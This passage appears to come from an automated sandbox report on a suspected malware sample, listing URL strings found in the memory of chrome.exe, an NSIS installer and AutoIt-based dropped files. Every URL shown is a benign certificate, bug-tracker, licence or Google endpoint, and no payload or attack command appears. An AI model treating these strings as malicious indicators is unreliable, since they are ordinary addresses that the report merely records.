    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
    Source: chrome.exe, 00000011.00000003.1988835700.000064DC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988754691.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988290844.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988521146.000064DC0101C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
    Source: CenteredDealing.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: chrome.exe, 00000011.00000003.1989256233.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988835700.000064DC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988754691.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988290844.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989177727.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988521146.000064DC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989308675.000064DC00F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989217305.000064DC009B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988654291.000064DC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
    Source: chrome.exe, 00000011.00000003.1989256233.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988835700.000064DC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988754691.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988290844.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989177727.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988521146.000064DC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989308675.000064DC00F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989217305.000064DC009B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988654291.000064DC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
    Source: chrome.exe, 00000011.00000003.1989256233.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988835700.000064DC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988754691.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988290844.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989177727.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988521146.000064DC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989308675.000064DC00F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989217305.000064DC009B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988654291.000064DC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
    Source: chrome.exe, 00000011.00000003.1989256233.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988835700.000064DC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988754691.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988290844.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989177727.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988521146.000064DC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989308675.000064DC00F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989217305.000064DC009B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988654291.000064DC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Rip.com, 0000000C.00000000.1707392543.00000000009C5000.00000002.00000001.01000000.00000007.sdmp, Bridal.8.dr, Rip.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: chromecache_90.19.drString found in binary or memory: http://www.broofa.com
    Source: CenteredDealing.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: 26pzcb.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
    Source: chromecache_87.19.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
    Source: chromecache_87.19.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
    Source: chrome.exe, 00000011.00000003.2009420903.000064DC01578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
    Source: chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
